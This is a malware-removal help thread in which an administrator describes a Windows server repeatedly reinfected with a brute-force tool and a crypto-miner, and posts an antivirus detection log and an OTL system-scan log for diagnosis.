Jump to content

Recommended Posts

Dear experts,

 

Like topics https://forums.malwarebytes.org/index.php?showtopic=134921 and https://forums.malwarebytes.org/index.php?showtopic=134318 this server seems to be infected with a nasty combination of malware.

Both Microsoft Forefront Endpoint Protection as well as MalwareBytes Anti-Malware detect svchosl.exe when running a scan. Both successfully remove the threat. A few hours/days later the infection returns.

 

MalwareBytes Anti-Rootkit doesn't find anything.

FRST64 doesn't find anything.

TDSSKiller doesn't find anything (haven't run it with Modules enabled yet though)

ComboFix obviously doesn't run on a server.

AdwCleaner doesn't find anything.

DDS.com/scr don't run on a server, so no logs, sorry.

ThreatExpert Memory scanner doesn't find anything.

RogueKillerX64 doesn't find anything.

JRT doesn't find anything.

 

Ran Kaspersky Rescue Disk 10 from USB drive, successfully removed the threat. However, infection returned.

 

Here's the log though:

 

Objects Scan: completed <1 minute ago   (events: 26, objects: 265366, time: 00:37:59)    
1/20/14 3:00 PM    Task completed            
1/20/14 3:00 PM    Deleted: HackTool.Win32.BruteForce.pma (analysis according to the database of dangerous URLs)    C:/Windows/tanechka/svchosl.exe        
1/20/14 2:57 PM    Detected: HackTool.Win32.BruteForce.pma (analysis according to the database of dangerous URLs)    C:/Windows/tanechka/svchosl.exe        
1/20/14 2:57 PM    Deleted: Trojan.BAT.Agent.alo    C:/Windows/tanechka/rdbrute.cmd        
1/20/14 2:57 PM    Detected: Trojan.BAT.Agent.alo    C:/Windows/tanechka/rdbrute.cmd        
1/20/14 2:57 PM    Deleted: Trojan.Win32.Miner.aai    C:/Windows/pts/pts_minerd32.exe        
1/20/14 2:53 PM    Detected: Trojan.Win32.Miner.aai    C:/Windows/pts/pts_minerd32.exe        
1/20/14 2:53 PM    Deleted: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar        
1/20/14 2:50 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:50 PM    Deleted: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:47 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:35 PM    Untreated: HackTool.Win32.BruteForce.pma (analysis according to the database of dangerous URLs)    C:/Windows/tanechka/svchosl.exe    Postponed    
1/20/14 2:35 PM    Detected: HackTool.Win32.BruteForce.pma (analysis according to the database of dangerous URLs)    C:/Windows/tanechka/svchosl.exe        
1/20/14 2:35 PM    Untreated: Trojan.BAT.Agent.alo    C:/Windows/tanechka/rdbrute.cmd    Postponed    
1/20/14 2:35 PM    Detected: Trojan.BAT.Agent.alo    C:/Windows/tanechka/rdbrute.cmd        
1/20/14 2:31 PM    Untreated: Trojan.Win32.Miner.aai    C:/Windows/pts/pts_minerd32.exe    Postponed    
1/20/14 2:31 PM    Detected: Trojan.Win32.Miner.aai    C:/Windows/pts/pts_minerd32.exe        
1/20/14 2:25 PM    Untreated: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe    Postponed    
1/20/14 2:25 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:25 PM    Untreated: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe    Postponed    
1/20/14 2:25 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:23 PM    Untreated: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe    Postponed    
1/20/14 2:23 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Downloads/DUbrute 2.1 + Scanner IP [Nmap].rar/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:23 PM    Untreated: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe    Postponed    
1/20/14 2:23 PM    Detected: HackTool.Win32.BruteForce.xl (analysis according to the database of dangerous URLs)    C:/Users/Administrator/Desktop/DUbrute + Scanner IP/DUBrute_2.1/DUBrute.exe        
1/20/14 2:22 PM    Task started

 

I have no idea how DUBrute + Scanner IP got on the Administrator desktop. Or how Google Chrome was installed. Or why I had realvnc.exe running. Or why I suddenly see Administrator logged onto the server via RDP from a WINNT-XXXXXX machine. Passwords have been changed, however.

 

I don't see any Registry Run values, Scheduled Tasks, Startup entries, anything like that.

 

I am officially at a loss. I would appreciate any assistance I can get! Will try to respond as quickly as possible, server can be rebooted at night time.

Link to post
Share on other sites

  • Root Admin

Please download OTL.exe by OldTimer to your Desktop.

  • Close all windows and double click OTL.exe.
  • Click Run Scan and let the program run uninterrupted.
  • It will produce two logs for you, one will pop up - OTL.txt, the other will be saved on your Desktop - Extras.txt. Post both logs in this thread.
  • You may need to use two posts to get it all.

 

 

Link to post
Share on other sites

OTL.T Log:

 

OTL logfile created on: 2/12/2014 2:47:42 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\administrator.COMPANY\Desktop
64bit- Server Standard Edition (full installation) Service Pack 1 (Version = 6.1.7601) - Type = NTServer
Internet Explorer (Version = 9.10.9200.16736)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
13.99 Gb Total Physical Memory | 2.37 Gb Available Physical Memory | 16.94% Memory free
27.98 Gb Paging File | 16.20 Gb Available in Paging File | 57.90% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 60.00 Gb Total Space | 31.49 Gb Free Space | 52.49% Space Free | Partition Type: NTFS
Drive D: | 486.80 Gb Total Space | 145.86 Gb Free Space | 29.96% Space Free | Partition Type: NTFS
 
Computer Name: COMPANY-HV | User Name: administrator | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - File not found --
PRC - [2014/02/12 14:47:02 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\administrator.COMPANY\Desktop\OTL.exe
PRC - [2010/11/21 04:24:24 | 000,042,496 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ftp.exe
PRC - [2010/11/21 04:24:06 | 000,302,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cmd.exe
 
 
========== Modules (No Company Name) ==========
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2013/12/07 07:20:03 | 000,192,512 | ---- | M] () [Auto | Running] -- C:\Windows\SysNative\sclient.exe -- (sclient)
SRV:64bit: - [2012/10/30 16:05:04 | 000,407,176 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\AdtAgent.exe -- (AdtAgent)
SRV:64bit: - [2012/10/30 16:05:02 | 000,633,968 | ---- | M] (Microsoft Corp.) [Disabled | Stopped] -- C:\Program Files\System Center Operations Manager\Gateway\APMDOTNETAgent\InterceptSvc.exe -- (System Center Management APM)
SRV:64bit: - [2012/10/30 16:05:02 | 000,025,200 | ---- | M] (Microsoft Corp.) [Auto | Running] -- C:\Program Files\System Center Operations Manager\Gateway\HealthService.exe -- (HealthService)
SRV:64bit: - [2010/11/21 04:25:10 | 000,049,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\snmp.exe -- (SNMP)
SRV:64bit: - [2010/11/21 04:24:50 | 000,193,024 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\vhdsvc.dll -- (vhdsvc)
SRV:64bit: - [2010/11/21 04:24:49 | 004,625,408 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\vmms.exe -- (vmms)
SRV:64bit: - [2010/11/21 04:24:49 | 000,407,040 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\nvspwmi.dll -- (nvspwmi)
SRV:64bit: - [2010/11/11 14:36:38 | 000,282,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2010/11/11 14:36:38 | 000,012,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2010/05/26 17:27:34 | 000,015,464 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\CpqMgmt\cqmgserv\cqmgserv.exe -- (CqMgServ)
SRV:64bit: - [2010/05/26 17:25:44 | 000,268,392 | ---- | M] (Hewlett-Packard Company) [Disabled | Stopped] -- C:\Windows\SysNative\CIMntfy\cimntfy.exe -- (CIMnotify)
SRV:64bit: - [2010/05/26 17:25:20 | 000,015,464 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\CpqMgmt\cqmghost\cqmghost.exe -- (CqMgHost)
SRV:64bit: - [2010/04/28 16:38:02 | 000,009,728 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\CPQNiMgt\cpqnimgt.exe -- (CpqNicMgmt)
SRV:64bit: - [2010/04/09 03:33:00 | 000,020,992 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\CpqMgmt\cqmgstor\cqmgstor.exe -- (CqMgStor)
SRV:64bit: - [2010/03/19 12:25:30 | 000,167,424 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files\HP\Cissesrv\cissesrv.exe -- (Cissesrv)
SRV:64bit: - [2010/01/25 14:50:28 | 000,017,960 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\sysdown.exe -- (sysdown)
SRV:64bit: - [2009/07/14 02:41:53 | 000,014,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\sacsvr.dll -- (sacsvr)
SRV:64bit: - [2009/07/14 02:40:52 | 000,025,600 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\FCRegSvc.dll -- (FCRegSvc)
SRV:64bit: - [2009/07/14 02:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV:64bit: - [2009/07/14 02:39:31 | 000,091,648 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rsopprov.exe -- (RSoPProv)
SRV:64bit: - [2008/11/14 12:21:50 | 000,022,568 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Windows\SysNative\cpqrcmc.exe -- (CpqRcmc)
SRV - [2010/11/21 04:25:22 | 000,047,616 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysWOW64\snmp.exe -- (SNMP)
SRV - [2010/03/25 13:52:58 | 001,307,648 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\hp\hpsmh\data\cgi-bin\vcagent\vcagent.exe -- (cpqvcagent)
SRV - [2010/01/28 11:13:00 | 002,041,856 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\hp\hpsmh\bin\smhstart.exe -- (SysMgmtHp)
SRV - [2009/06/10 22:23:09 | 000,066,384 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2012/03/01 07:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/05/14 05:57:00 | 000,407,552 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\vmswitch.sys -- (VMSP)
DRV:64bit: - [2011/05/14 05:57:00 | 000,407,552 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vmswitch.sys -- (VMSMP)
DRV:64bit: - [2011/05/14 05:56:44 | 000,120,320 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\storvsp.sys -- (storvsp)
DRV:64bit: - [2010/11/21 04:24:50 | 000,119,168 | ---- | M] (Microsoft Corporation) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\hvboot.sys -- (hvboot)
DRV:64bit: - [2010/11/21 04:24:30 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/21 04:24:00 | 000,181,760 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Vid.sys -- (Vid)
DRV:64bit: - [2010/11/21 04:24:00 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2010/11/21 04:24:00 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/21 04:24:00 | 000,071,168 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:64bit: - [2010/11/21 04:24:00 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2010/11/21 04:24:00 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2010/11/21 04:24:00 | 000,020,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\passthruparser.sys -- (passthruparser)
DRV:64bit: - [2010/11/21 04:24:00 | 000,017,408 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vhdparser.sys -- (vhdparser)
DRV:64bit: - [2010/10/24 21:25:38 | 000,072,064 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2010/04/30 08:42:40 | 000,384,040 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (q57nd60a)
DRV:64bit: - [2010/04/30 08:42:40 | 000,384,040 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2010/02/24 06:07:10 | 000,225,792 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\cpqteam.sys -- (CPQTeam)
DRV:64bit: - [2010/02/22 13:02:18 | 000,156,776 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\HpCISSs2.sys -- (HpCISSs2)
DRV:64bit: - [2010/01/25 14:50:26 | 000,160,296 | ---- | M] (Hewlett-Packard Company) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\hpqilo2.sys -- (hpqilo2)
DRV:64bit: - [2009/07/14 02:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/14 02:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/14 02:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/14 02:45:45 | 000,096,320 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\sacdrv.sys -- (sacdrv)
DRV:64bit: - [2009/06/24 23:33:46 | 002,210,816 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ati2mtag.sys -- (ati2mtag)
DRV:64bit: - [2009/06/10 21:35:30 | 000,035,328 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\qd260x64.sys -- (ioatdma)
DRV:64bit: - [2009/06/10 21:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 21:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/05/11 16:08:08 | 000,051,752 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\cpqcidrv.sys -- (CpqCiDrv)
DRV - [2009/07/14 02:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
 
 
 
 
 
 

IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL =
IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages =

IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR
IE - HKU\S-1-5-21-2393671911-345160661-65003576-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
 
========== FireFox ==========
 
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
 
 
 
O1 HOSTS File: ([2013/12/03 19:46:41 | 000,000,862 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 188.122.70.10         scom01.asapnet.local
O4:64bit: - HKLM..\Run: [CPQTEAM] C:\Program Files\HP\NCU\cpqteam.exe (Hewlett-Packard Company)
O4:64bit: - HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: ShowSuperHidden = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoWelcomeScreen = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: disablecad = 0
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O16 - DPF: {82774781-8F4E-11D1-AB1C-0000F8773BF0} https://transfers.ds.microsoft.com/FTM/TransferSource/grTransferCtrl.cab (DLC Class)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = COMPANY.local
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{C7B52165-FFD6-4475-A339-E29F9F34975A}: NameServer = 192.168.10.11,8.8.8.8
O18:64bit: - Protocol\Handler\hpapp - No CLSID value found
O18:64bit: - Protocol\Handler\hpapp\Apps - No CLSID value found
O18 - Protocol\Handler\hpapp {24F45006-5BD9-41B7-9BD9-5F8921C8EBD1} - C:\Program Files (x86)\Compaq\Cpqacuxe\Bin\hpapp.dll (Hewlett-Packard Company)
O18 - Protocol\Handler\hpapp\Apps - No CLSID value found
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\AtiExtEvent: DllName - (Ati2evxx.dll) -  File not found
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/11/30 11:59:12 | 000,006,101 | ---- | M] () - C:\autounattend.xml.old -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/02/12 14:47:02 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\administrator.COMPANY\Desktop\OTL.exe
[2014/02/07 15:04:54 | 000,000,000 | ---D | C] -- C:\Windows\mtc
[2014/02/07 14:57:21 | 000,000,000 | ---D | C] -- C:\Windows\pts
[2014/02/07 14:45:43 | 000,000,000 | ---D | C] -- C:\Windows\xpm
[2014/02/07 14:42:10 | 000,000,000 | ---D | C] -- C:\Windows\tanechka
[2014/02/05 09:53:33 | 000,000,000 | ---D | C] -- C:\FRST
[2014/02/05 09:52:10 | 002,080,256 | ---- | C] (Farbar) -- C:\Users\administrator.COMPANY\Desktop\FRST64.exe
[2014/01/29 14:03:31 | 000,119,000 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/01/29 14:03:13 | 000,091,352 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/01/29 09:39:01 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
[2014/01/29 09:38:48 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys
[2014/01/29 09:38:47 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware
[2014/01/29 09:34:29 | 010,285,040 | ---- | C] (Malwarebytes Corporation                                    ) -- C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
[2014/01/26 19:52:19 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft Security Client
[2014/01/26 19:52:15 | 000,000,000 | ---D | C] -- C:\Program Files\Microsoft Security Client
[2014/01/26 02:55:47 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\Macromed
[2014/01/26 02:55:44 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\Macromed
[2014/01/23 12:58:56 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\AppData\Roaming\Malwarebytes
[2014/01/23 12:08:40 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ThreatExpert Memory Scanner
[2014/01/23 12:08:39 | 000,000,000 | ---D | C] -- C:\Program Files\ThreatExpert Memory Scanner
[2014/01/23 12:08:18 | 001,536,352 | ---- | C] (Threat Expert Ltd.                                          ) -- C:\Users\administrator.COMPANY\Desktop\TEMSSetup-x64.exe
[2014/01/23 11:36:16 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2014/01/23 11:36:11 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2014/01/23 11:33:56 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\Desktop\temp
[2014/01/23 11:20:16 | 012,589,848 | ---- | C] (Malwarebytes Corp.) -- C:\Users\administrator.COMPANY\Desktop\mbar-1.07.0.1009.exe
[2014/01/23 11:11:37 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/01/23 11:10:50 | 001,037,068 | ---- | C] (Thisisu) -- C:\Users\administrator.COMPANY\Desktop\JRT.exe
[2014/01/23 11:08:18 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/01/23 11:03:00 | 005,173,757 | ---- | C] (Swearware) -- C:\Users\administrator.COMPANY\Desktop\ComboFix.exe
[2014/01/23 10:43:23 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\Desktop\RK_Quarantine
[2014/01/20 15:08:15 | 000,000,000 | ---D | C] -- C:\Kaspersky Rescue Disk 10.0
[2014/01/17 10:52:47 | 000,000,000 | ---D | C] -- C:\ProgramData\SeriousBit
[2014/01/17 10:52:32 | 000,041,392 | ---- | C] (SeriousBit) -- C:\Windows\SysNative\drivers\nbdrv.sys
[2014/01/17 10:52:11 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\AppData\Local\Programs
[2014/01/15 12:25:47 | 000,000,000 | ---D | C] -- C:\Users\administrator.COMPANY\AppData\Roaming\WinRAR
[2014/01/15 11:14:08 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\restore
 
========== Files - Modified Within 30 Days ==========
 
[2014/02/12 14:47:02 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\administrator.COMPANY\Desktop\OTL.exe
[2014/02/12 14:45:47 | 000,000,908 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/02/12 14:12:00 | 000,000,912 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/02/12 08:08:58 | 000,000,894 | ---- | M] () -- C:\Windows\SysWow64\tmp62.cmd
[2014/02/12 08:01:31 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp61.cmd
[2014/02/11 05:04:06 | 000,000,890 | ---- | M] () -- C:\Windows\SysWow64\tmp59.cmd
[2014/02/11 05:00:38 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp58.cmd
[2014/02/11 04:57:11 | 000,001,462 | ---- | M] () -- C:\Windows\SysWow64\tmp57.cmd
[2014/02/10 12:06:53 | 000,001,990 | -H-- | M] () -- C:\Users\administrator.COMPANY\Documents\Default.rdp
